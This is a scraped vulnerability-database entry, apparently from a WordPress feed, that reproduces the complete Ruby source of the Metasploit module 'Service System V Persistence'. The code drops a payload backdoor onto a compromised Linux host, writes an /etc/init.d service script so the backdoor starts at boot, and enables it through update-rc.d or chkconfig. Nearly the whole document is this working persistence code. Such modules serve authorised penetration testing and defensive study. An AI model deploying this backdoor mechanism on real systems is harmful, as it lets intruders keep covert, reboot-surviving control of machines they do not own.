{“lastseen”:”2025-10-16T19:43:05″,”description”:”This module will create a service via System V on the box, and mark it for auto-restart. We need enough…”,”published”:”2025-10-16T18:57:32″,”modified”:”2025-10-16T18:57:32″,”type”:”metasploit”,”title”:”Service System V Persistence”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-LINUX-PERSISTENCE-INIT_SYSVINIT-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Local\\n Rank = ExcellentRanking\\n\\n include Msf::Post::File\\n include Msf::Post::Unix\\n include Msf::Exploit::EXE # for generate_payload_exe\\n include Msf::Exploit::FileDropper\\n include Msf::Exploit::Local::Persistence\\n prepend Msf::Exploit::Remote::AutoCheck\\n include Msf::Exploit::Deprecated\\n moved_from ‘exploits\/linux\/local\/service_persistence’\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Service System V Persistence’,\\n ‘Description’ =\\u003e %q{\\n This module will create a service via System V on the box, and mark it for auto-restart.\\n We need enough access to write service files and potentially restart services.\\n\\n Some systems include backwards compatibility, such as Ubuntu up to about 16.04.\\n\\n Targets:\\n CentOS \\u003c= 5\\n Debian \\u003c= 6\\n Kali 2.0\\n Ubuntu \\u003c= 6.06\\n Note: System V won’t restart the service if it dies, only an init change (reboot etc) will restart it.\\n\\n Verified on Kali 2.0, Ubuntu 10.04\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n ‘h00die’,\\n ],\\n ‘Platform’ =\\u003e [‘unix’, ‘linux’],\\n ‘Targets’ =\\u003e [\\n [\\n ‘System V’, {\\n runlevel: ‘2 3 4 5’\\n }\\n ]\\n ],\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘Arch’ =\\u003e [\\n ARCH_CMD,\\n ARCH_X86,\\n ARCH_X64,\\n ARCH_ARMLE,\\n ARCH_AARCH64,\\n ARCH_PPC,\\n ARCH_MIPSLE,\\n ARCH_MIPSBE\\n ],\\n ‘References’ =\\u003e [\\n [‘URL’, ‘https:\/\/www.digitalocean.com\/community\/tutorials\/how-to-configure-a-linux-service-to-start-automatically-after-a-crash-or-reboot-part-1-practical-examples’],\\n [‘ATT\\u0026CK’, Mitre::Attack::Technique::T1543_CREATE_OR_MODIFY_SYSTEM_PROCESS]\\n ],\\n ‘SessionTypes’ =\\u003e [‘shell’, ‘meterpreter’],\\n ‘Privileged’ =\\u003e true,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION, EVENT_DEPENDENT],\\n ‘SideEffects’ =\\u003e [ARTIFACTS_ON_DISK, CONFIG_CHANGES]\\n },\\n ‘DisclosureDate’ =\\u003e ‘1983-01-01’ # system v release date\\n )\\n )\\n\\n register_options(\\n [\\n OptString.new(‘PAYLOAD_NAME’, [false, ‘Name of shell file to write’]),\\n OptString.new(‘SERVICE’, [false, ‘Name of service to create’])\\n ]\\n )\\n register_advanced_options(\\n [\\n OptBool.new(‘EnableService’, [true, ‘Enable the service’, true])\\n ]\\n )\\n end\\n\\n def check\\n print_warning(‘Payloads in \/tmp will only last until reboot, you want to choose elsewhere.’) if writable_dir.start_with?(‘\/tmp’)\\n return CheckCode::Safe(\\”#{writable_dir} isnt writable\\”) unless writable?(writable_dir)\\n return CheckCode::Safe(‘\/etc\/init.d\/ isnt writable’) unless writable?(‘\/etc\/init.d\/’)\\n\\n has_updatercd = command_exists?(‘update-rc.d’)\\n if has_updatercd || command_exists?(‘chkconfig’) # centos 5\\n return CheckCode::Appears(\\”#{writable_dir} is writable and system is System V based\\”)\\n end\\n\\n CheckCode::Safe(‘Likely not a System V based system’)\\n end\\n\\n def install_persistence\\n backdoor = write_shell(writable_dir)\\n\\n path = backdoor.split(‘\/’)[0…-1].join(‘\/’)\\n file = backdoor.split(‘\/’)[-1]\\n\\n system_v(path, file, target.opts[:runlevel], command_exists?(‘update-rc.d’))\\n end\\n\\n def write_shell(path)\\n file_name = datastore[‘PAYLOAD_NAME’] || Rex::Text.rand_text_alpha(5..10)\\n backdoor = \\”#{path}\/#{file_name}\\”\\n vprint_status(\\”Writing backdoor to #{backdoor}\\”)\\n if payload.arch.first == ‘cmd’\\n write_file(backdoor, payload.encoded)\\n chmod(backdoor, 0o755)\\n else\\n upload_and_chmodx backdoor, generate_payload_exe\\n end\\n @clean_up_rc \\u003c\\u003c \\”rm #{backdoor}\\\\n\\”\\n\\n if file_exist?(backdoor)\\n chmod(backdoor, 0o711)\\n return backdoor\\n end\\n fail_with(Failure::NoAccess, ‘File not written, check permissions.’)\\n end\\n\\n def system_v(backdoor_path, backdoor_file, runlevel, has_updatercd)\\n if has_updatercd\\n vprint_status(‘Utilizing update-rc.d’)\\n else\\n vprint_status(‘Utilizing chkconfig’)\\n end\\n\\n service_filename = datastore[‘SERVICE’] || Rex::Text.rand_text_alpha(7..12)\\n\\n script = \\u003c\\u003c~EOF\\n #!\/bin\/sh\\n ### BEGIN INIT INFO\\n # Provides: #{service_filename}\\n # Required-Start: $network\\n # Required-Stop: $network\\n # Default-Start: #{runlevel}\\n # Default-Stop: 0 1 6\\n # Short-Description: Start daemon at boot time\\n # Description: Enable service provided by daemon.\\n ### END INIT INFO\\n DIR=\\”#{backdoor_path}\\”\\n CMD=\\”#{backdoor_file}\\”\\n NAME=\\”$(basename \\”$0\\”)\\”\\n PID_FILE=\\”\/var\/run\/$NAME.pid\\”\\n STDOUT_LOG=\\”\/var\/log\/$NAME.log\\”\\n STDERR_LOG=\\”\/var\/log\/$NAME.err\\”\\n get_pid() {\\n [ -f \\”$PID_FILE\\” ] \\u0026\\u0026 cat \\”$PID_FILE\\”\\n }\\n is_running() {\\n PID=$(get_pid)\\n [ -n \\”$PID\\” ] \\u0026\\u0026 kill -0 \\”$PID\\” 2\\u003e\/dev\/null\\n }\\n start_service() {\\n if is_running; then\\n echo \\”$NAME is already running.\\”\\n return 0\\n fi\\n echo \\”Starting $NAME…\\”\\n sleep 10 \\u0026\\u0026 $DIR\/$CMD \\u003e\\u003e \\”$STDOUT_LOG\\” 2\\u003e\\u003e \\”$STDERR_LOG\\” \\u0026\\n echo $! \\u003e \\”$PID_FILE\\”\\n sleep 1\\n if is_running; then\\n echo \\”$NAME started successfully.\\”\\n else\\n echo \\”Failed to start $NAME. Check logs: $STDOUT_LOG $STDERR_LOG\\”\\n exit 1\\n fi\\n }\\n stop_service() {\\n if ! is_running; then\\n echo \\”$NAME is not running.\\”\\n return 0\\n fi\\n echo \\”Stopping $NAME…\\”\\n kill \\”$(get_pid)\\” \\u0026\\u0026 rm -f \\”$PID_FILE\\”\\n for i in $(seq 1 10); do\\n if ! is_running; then\\n echo \\”$NAME stopped.\\”\\n return 0\\n fi\\n sleep 1\\n done\\n echo \\”Failed to stop $NAME.\\”\\n exit 1\\n }\\n case \\”$1\\” in\\n start) start_service ;;\\n stop) stop_service ;;\\n restart)\\n stop_service\\n start_service\\n ;;\\n status)\\n if is_running; then\\n echo \\”$NAME is running.\\”\\n else\\n echo \\”$NAME is stopped.\\”\\n exit 1\\n fi\\n ;;\\n *)\\n echo \\”Usage: $0 {start|stop|restart|status}\\”\\n exit 1\\n ;;\\n esac\\n exit 0\\n EOF\\n\\n service_name = \\”\/etc\/init.d\/#{service_filename}\\”\\n vprint_status(\\”Writing service: #{service_name}\\”)\\n write_file(service_name, script)\\n\\n fail_with(Failure::NoAccess, ‘Service file not written, check permissions.’) unless file_exist?(service_name)\\n\\n @clean_up_rc \\u003c\\u003c \\”rm #{service_name}\\\\n\\”\\n @clean_up_rc \\u003c\\u003c \\”rm \/var\/log\/#{service_name}.log\\\\n\\”\\n @clean_up_rc \\u003c\\u003c \\”rm \/var\/log\/#{service_name}.err\\\\n\\”\\n chmod(service_name, 0o755)\\n print_good(‘Enabling \\u0026 starting our service (10 second delay for payload)’)\\n if has_updatercd\\n cmd_exec(\\”update-rc.d #{service_filename} defaults\\”)\\n cmd_exec(\\”update-rc.d #{service_filename} enable\\”)\\n if file_exist?(‘\/usr\/sbin\/service’) # some systems have update-rc.d but not service binary, have a fallback just in case\\n cmd_exec(\\”service #{service_filename} start\\”)\\n else\\n cmd_exec(\\”\/etc\/init.d\/#{service_filename} start\\”)\\n end\\n else # CentOS\\n cmd_exec(\\”chkconfig –add #{service_filename}\\”)\\n cmd_exec(\\”chkconfig #{service_filename} on\\”)\\n cmd_exec(\\”\/etc\/init.d\/#{service_filename} start\\”)\\n end\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/linux\/persistence\/init_sysvinit.rb”,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/linux\/persistence\/init_sysvinit\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-10-16T19:43:05″,”description”:”This module will create a service via System V on the box, and mark it for auto-restart. We need enough…”,”published”:”2025-10-16T18:57:32″,”modified”:”2025-10-16T18:57:32″,”type”:”metasploit”,”title”:”Service System V Persistence”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-LINUX-PERSISTENCE-INIT_SYSVINIT-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”##\\n# This module…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,169,13,33,7,11,5],"class_list":["post-22142","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-metasploit","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n